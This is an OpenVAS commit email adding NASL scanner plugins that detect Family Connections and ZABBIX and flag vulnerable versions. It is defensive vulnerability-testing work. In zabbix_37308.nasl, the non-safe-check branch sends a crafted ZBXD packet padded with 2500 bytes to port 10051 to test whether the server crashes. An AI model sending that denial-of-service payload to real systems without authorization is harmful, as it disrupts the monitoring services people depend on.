[Openvas-commits] r6181 - in trunk/openvas-plugins: . scripts

scm-commit@wald.intevation.org scm-commit at wald.intevation.org
Thu Dec 17 19:46:11 CET 2009


Author: mime
Date: 2009-12-17 19:46:08 +0100 (Thu, 17 Dec 2009)
New Revision: 6181

Added:
   trunk/openvas-plugins/scripts/family_connections_37379.nasl
   trunk/openvas-plugins/scripts/family_connections_detect.nasl
   trunk/openvas-plugins/scripts/zabbix_37308.nasl
   trunk/openvas-plugins/scripts/zabbix_37309.nasl
   trunk/openvas-plugins/scripts/zabbix_detect.nasl
   trunk/openvas-plugins/scripts/zabbix_web_detect.nasl
Modified:
   trunk/openvas-plugins/ChangeLog
   trunk/openvas-plugins/cve_current.txt
Log:
Added new plugins

Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog	2009-12-17 16:59:15 UTC (rev 6180)
+++ trunk/openvas-plugins/ChangeLog	2009-12-17 18:46:08 UTC (rev 6181)
@@ -1,3 +1,13 @@
+2009-12-17 Michael Meyer <michael.meyer at intevation.de>
+
+	* scripts/family_connections_detect.nasl,
+	scripts/zabbix_37308.nasl,
+	scripts/family_connections_37379.nasl,
+	scripts/zabbix_detect.nasl,
+	scripts/zabbix_web_detect.nasl,
+	scripts/zabbix_37309.nasl:
+	Added new plugins.
+
 2009-12-17  Chandrashekhar B <bchandra at secpod.com>
 
 	* scripts/gb_ms_indeo_codec_mult_vuln.nasl: Fixed an issue.

Modified: trunk/openvas-plugins/cve_current.txt
===================================================================
--- trunk/openvas-plugins/cve_current.txt	2009-12-17 16:59:15 UTC (rev 6180)
+++ trunk/openvas-plugins/cve_current.txt	2009-12-17 18:46:08 UTC (rev 6181)
@@ -397,3 +397,6 @@
 CVE-2009-4225			SecPod		svn		L
 CVE-2009-4129			SecPod		svn		L
 CVE-2009-4130			SecPod		svn		L
+37379				Greenbone	svn		R
+37308				Greenbone	svn		R
+37309				Greenbone	svn		R

Added: trunk/openvas-plugins/scripts/family_connections_37379.nasl
===================================================================
--- trunk/openvas-plugins/scripts/family_connections_37379.nasl	2009-12-17 16:59:15 UTC (rev 6180)
+++ trunk/openvas-plugins/scripts/family_connections_37379.nasl	2009-12-17 18:46:08 UTC (rev 6181)
@@ -0,0 +1,89 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Family Connections Multiple Input Validation Vulnerabilities
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100408);
+ script_bugtraq_id(37379);
+ script_version ("1.0-$Revision$");
+
+ script_name("Family Connections Multiple Input Validation Vulnerabilities");
+
+desc = "Overview:
+Family Connections is prone to multiple input-validation
+vulnerabilities, including a local file-include issue, an arbitrary
+file-upload issue, and multiple SQL-injection issues. These issues
+occur because the application fails to properly sanitize user-
+supplied input.
+
+Exploiting these issues may allow an unauthorized user to view files
+and execute local scripts, execute arbitrary script code, access or
+modify data, or exploit latent vulnerabilities in the underlying
+database implementation.
+
+Family Connections versions 2.1.3 and prior are affected.
+
+References:
+http://www.securityfocus.com/bid/37379
+http://www.haudenschilt.com/fcms/index.html
+
+Risk factor : Medium";
+
+ script_description(desc);
+ script_summary("Determine if Family Connections version is < 2.1.3");
+ script_category(ACT_GATHER_INFO);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("family_connections_detect.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+include("version_func.inc");
+
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+
+if (!can_host_php(port:port)) exit(0);
+
+if(!version = get_kb_item(string("www/", port, "/FamilyConnections")))exit(0);
+if(!matches = eregmatch(string:version, pattern:"^(.+) under (/.*)$"))exit(0);
+
+vers = matches[1];
+
+if(!isnull(vers) && vers >!< "unknown") {
+
+  if(version_is_less_equal(version: vers, test_version: "2.1.3")) {
+      security_warning(port:port);
+      exit(0);
+  }
+
+}
+
+exit(0);


Property changes on: trunk/openvas-plugins/scripts/family_connections_37379.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/family_connections_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/family_connections_detect.nasl	2009-12-17 16:59:15 UTC (rev 6180)
+++ trunk/openvas-plugins/scripts/family_connections_detect.nasl	2009-12-17 18:46:08 UTC (rev 6181)
@@ -0,0 +1,113 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Family Connections Detection
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+# need desc here to modify it later in script.
+desc = "Overview:
+This host is running Family Connections, an easy-to-use website where
+you can connect with your friends and family. Share photos, messages,
+documents and more.
+
+See also:
+http://www.familycms.com/
+
+Risk factor : None";
+
+if (description)
+{
+ script_id(100407);
+ script_version ("1.0-$Revision$");
+
+ script_name("Family Connections Detection");
+ script_description(desc);
+ script_summary("Checks for the presence of Family Connections");
+ script_category(ACT_GATHER_INFO);
+ script_family("Service detection");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+
+include("http_func.inc");
+include("http_keepalive.inc");
+include("global_settings.inc");
+
+port = get_http_port(default:80);
+
+if(!get_port_state(port))exit(0);
+if(!can_host_php(port:port))exit(0);
+
+dirs = make_list("/fcms",cgi_dirs());
+
+foreach dir (dirs) {
+
+ url = string(dir, "/index.php");
+ req = http_get(item:url, port:port);
+ buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
+ if( buf == NULL )continue;
+
+ if(egrep(pattern: "<title>.* - powered by Family Connections", string: buf, icase: TRUE) &&
+    egrep(pattern: "Login to", string: buf) &&
+    egrep(pattern: "login_box", string: buf))  {
+
+     if(strlen(dir)>0) {
+        install=dir;
+     } else {
+        install=string("/");
+     }
+
+    vers = string("unknown");
+    ### try to get version 
+    version = eregmatch(string: buf, pattern: "powered by Family Connections ([0-9.]+)",icase:TRUE);
+
+    if ( !isnull(version[1]) ) {
+       vers=chomp(version[1]);
+    }
+
+    set_kb_item(name: string("www/", port, "/FamilyConnections"), value: string(vers," under ",install));
+
+    info = string("None\n\nFamily Connections Version '");
+    info += string(vers);
+    info += string("' was detected on the remote host in the following directory(s):\n\n");
+    info += string(install, "\n");
+
+    desc = ereg_replace(
+        string:desc,
+        pattern:"None$",
+        replace:info
+    );
+
+       if(report_verbosity > 0) {
+         security_note(port:port,data:desc);
+       }
+       exit(0);
+
+ }
+}
+exit(0);
+


Property changes on: trunk/openvas-plugins/scripts/family_connections_detect.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/zabbix_37308.nasl
===================================================================
--- trunk/openvas-plugins/scripts/zabbix_37308.nasl	2009-12-17 16:59:15 UTC (rev 6180)
+++ trunk/openvas-plugins/scripts/zabbix_37308.nasl	2009-12-17 18:46:08 UTC (rev 6181)
@@ -0,0 +1,119 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# ZABBIX 'process_trap()' NULL Pointer Dereference Denial Of Service Vulnerability
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100404);
+ script_bugtraq_id(37308);
+ script_version ("1.0-$Revision$");
+
+ script_name("ZABBIX 'process_trap()' NULL Pointer Dereference Denial Of Service Vulnerability");
+
+desc = "Overview:
+ZABBIX is prone to a denial-of-service vulnerability because
+of a NULL-pointer dereference.
+
+Successful exploits may allow remote attackers to cause denial-of-
+service conditions. Given the nature of this issue, attackers may also
+be able to run arbitrary code, but this has not been confirmed.
+
+Versions prior to ZABBIX 1.6.6 are vulnerable.
+
+Solution:
+Updates are available. Please see the references for details.
+
+References:
+http://www.securityfocus.com/bid/37308
+http://www.zabbix.com/index.php
+
+Risk factor : Medium";
+
+ script_description(desc);
+ script_summary("Determine if ZABBIX is prone to a denial-of-service vulnerability");
+ script_category(ACT_MIXED_ATTACK);
+ script_family("Denial of Service ");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("zabbix_detect.nasl","zabbix_web_detect.nasl");
+ script_require_ports("Services/www","Services/zabbix_server", 80, 10051);
+ exit(0);
+}
+
+if(safe_checks()) {
+
+  include("http_func.inc");
+  include("version_func.inc");
+
+  port = get_http_port(default:80);
+  if(!get_port_state(port))exit(0);
+  if (!can_host_php(port:port)) exit(0);
+
+  if(!version = get_kb_item(string("www/", port, "/zabbix_client")))exit(0);
+  if(!matches = eregmatch(string:version, pattern:"^(.+) under (/.*)$"))exit(0);
+
+  vers = matches[1];
+
+  if(zabbix_port = get_kb_item("Services/zabbix_server")) {
+    port = zabbix_port;
+  }  
+
+  if(version_is_less(version: vers, test_version: "1.6.6")) {
+    security_warning(port:port);
+    exit(0);
+  }  
+
+} else {  
+
+  port = get_kb_item("Services/zabbix_server");
+  if(!port)port = 10051;
+  if(!get_port_state(port))exit(0);
+
+  soc = open_sock_tcp(port);
+  if(!soc)exit(0);
+
+  header = string("ZBXD") + raw_string(0x01);
+  data  += crap(data:"A", length: 2500);
+  data  += string(":B");
+  size   = strlen(data);
+
+  req = header + size + data;
+
+  send(socket:soc, data:req);
+  close(soc);
+
+  sleep(5);
+
+  soc1 = open_sock_tcp(port);
+
+  if(!soc1) {
+    security_warning(port:port);
+    exit(0);
+  }
+
+  close(soc1);
+}
+
+exit(0);
+


Property changes on: trunk/openvas-plugins/scripts/zabbix_37308.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/zabbix_37309.nasl
===================================================================
--- trunk/openvas-plugins/scripts/zabbix_37309.nasl	2009-12-17 16:59:15 UTC (rev 6180)
+++ trunk/openvas-plugins/scripts/zabbix_37309.nasl	2009-12-17 18:46:08 UTC (rev 6181)
@@ -0,0 +1,91 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# ZABBIX Denial Of Service and SQL Injection Vulnerabilities
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100406);
+ script_bugtraq_id(37309);
+ script_version ("1.0-$Revision$");
+
+ script_name("ZABBIX Denial Of Service and SQL Injection Vulnerabilities");
+
+desc = "Overview:
+ZABBIX is prone to a denial-of-service vulnerability and an SQL-
+injection vulnerability.
+
+Successful exploits may allow remote attackers to crash the affected
+application, exploit latent vulnerabilities in the underlying
+database, access or modify data, or compromise the application.
+
+Versions prior to ZABBIX 1.6.8 are vulnerable.
+
+Solution:
+Updates are available. Please see the references for details.
+
+References:
+http://www.securityfocus.com/bid/37309
+http://www.zabbix.com/index.php
+
+Risk factor : Medium";
+
+ script_description(desc);
+ script_summary("Determine if ZABBIX version is < 1.6.8");
+ script_category(ACT_GATHER_INFO);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("zabbix_detect.nasl","zabbix_web_detect.nasl");
+ script_require_ports("Services/www","Services/zabbix_server", 80,10051);
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+include("version_func.inc");
+
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+if (!can_host_php(port:port)) exit(0);
+
+if(!version = get_kb_item(string("www/", port, "/zabbix_client")))exit(0);
+if(!matches = eregmatch(string:version, pattern:"^(.+) under (/.*)$"))exit(0);
+
+vers = matches[1];
+
+if(!isnull(vers) && vers >!< "unknown") {
+
+  if(version_is_less(version: vers, test_version: "1.6.8")) {
+    
+    if(zabbix_port = get_kb_item("Services/zabbix_server")) {
+      port = zabbix_port;
+    }
+
+    security_warning(port:port);
+    exit(0);
+  }
+
+}
+
+exit(0);


Property changes on: trunk/openvas-plugins/scripts/zabbix_37309.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/zabbix_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/zabbix_detect.nasl	2009-12-17 16:59:15 UTC (rev 6180)
+++ trunk/openvas-plugins/scripts/zabbix_detect.nasl	2009-12-17 18:46:08 UTC (rev 6181)
@@ -0,0 +1,76 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# ZABBIX Server Detection
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+# need desc here to modify it later in script.
+desc = "Overview:
+This host is running a ZABBIX Server. Zabbix is an enterprise-class
+open source distributed monitoring solution. 
+
+See also:
+http://www.zabbix.com
+
+Risk factor : None";
+
+if (description)
+{
+ script_id(100403);
+ script_version ("1.0-$Revision$");
+
+ script_name("ZABBIX Server Detection");
+ script_description(desc);
+ script_summary("Checks for the presence of ZABBIX Server");
+ script_category(ACT_GATHER_INFO);
+ script_family("Service detection");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes");
+ script_require_ports("Services/unknown", 10051);
+ exit(0);
+}
+
+include("misc_func.inc");
+
+port = 10051;
+if(!get_port_state(port))exit(0);
+
+soc = open_sock_tcp(port);
+if(!soc)exit(0);
+
+req = string("ZBX_GET_HISTORY_LAST_ID");
+send(socket:soc, data:req);
+
+buf = recv(socket:soc, length:1024);
+close(soc);
+
+if(isnull(buf))exit(0);
+
+if("ZBXD" >< buf) {
+  register_service(port:port, ipproto:"tcp", proto:"zabbix_server");
+  set_kb_item(name: string("cpe:/a:zabbix:zabbix"), value: TRUE);
+  security_note(port:port);
+  exit(0);
+}
+
+exit(0);


Property changes on: trunk/openvas-plugins/scripts/zabbix_detect.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/zabbix_web_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/zabbix_web_detect.nasl	2009-12-17 16:59:15 UTC (rev 6180)
+++ trunk/openvas-plugins/scripts/zabbix_web_detect.nasl	2009-12-17 18:46:08 UTC (rev 6181)
@@ -0,0 +1,117 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# ZABBIX Web Interface Detection
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+# need desc here to modify it later in script.
+desc = "Overview:
+This host is running the ZABBIX Web Interface.
+
+See also:
+http://www.zabbix.com/
+
+Risk factor : None";
+
+if (description)
+{
+ script_id(100405);
+ script_version ("1.0-$Revision$");
+
+ script_name("ZABBIX Web Interface Detection");
+ script_description(desc);
+ script_summary("Checks for the presence of ZABBIX Web Interface");
+ script_category(ACT_GATHER_INFO);
+ script_family("Service detection");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes", "http_version.nasl","zabbix_detect.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+
+include("http_func.inc");
+include("http_keepalive.inc");
+include("global_settings.inc");
+
+port = get_http_port(default:80);
+
+if(!get_port_state(port))exit(0);
+if(!can_host_php(port:port))exit(0);
+
+dirs = make_list("/zabbix","/monitoring",cgi_dirs());
+
+foreach dir (dirs) {
+
+ url = string(dir, "/index.php");
+ req = http_get(item:url, port:port);
+ buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
+ if( buf == NULL )continue;
+
+ if(egrep(pattern: "index.php\?login=1", string: buf, icase: TRUE) &&
+    egrep(pattern: "SIA Zabbix", string: buf))  {
+
+     if(strlen(dir)>0) {
+        install=dir;
+     } else {
+        install=string("/");
+     }
+
+    vers = string("unknown");
+    ### try to get version 
+    version = eregmatch(string: buf, pattern: "Zabbix&nbsp;([0-9.]+)",icase:TRUE);
+
+    if ( !isnull(version[1]) ) {
+       vers=chomp(version[1]);
+    }
+
+    set_kb_item(name: string("www/", port, "/zabbix_client"), value: string(vers," under ",install));
+    if("unknown" >!< vers) {
+      set_kb_item(name: string("cpe:/a:zabbix:zabbix:",vers), value: TRUE);
+    } else {
+     if(!get_kb_item(string("cpe:/a:zabbix:zabbix"))) { 
+      set_kb_item (name: string("cpe:/a:zabbix:zabbix"), value: TRUE);
+     } 
+    }  
+
+    info = string("None\n\nZabbix Version '");
+    info += string(vers);
+    info += string("' was detected on the remote host in the following directory(s):\n\n");
+    info += string(install, "\n");
+
+    desc = ereg_replace(
+        string:desc,
+        pattern:"None$",
+        replace:info
+    );
+
+       if(report_verbosity > 0) {
+         security_note(port:port,data:desc);
+       }
+       exit(0);
+
+ }
+}
+exit(0);
+


Property changes on: trunk/openvas-plugins/scripts/zabbix_web_detect.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision



More information about the Openvas-commits mailing list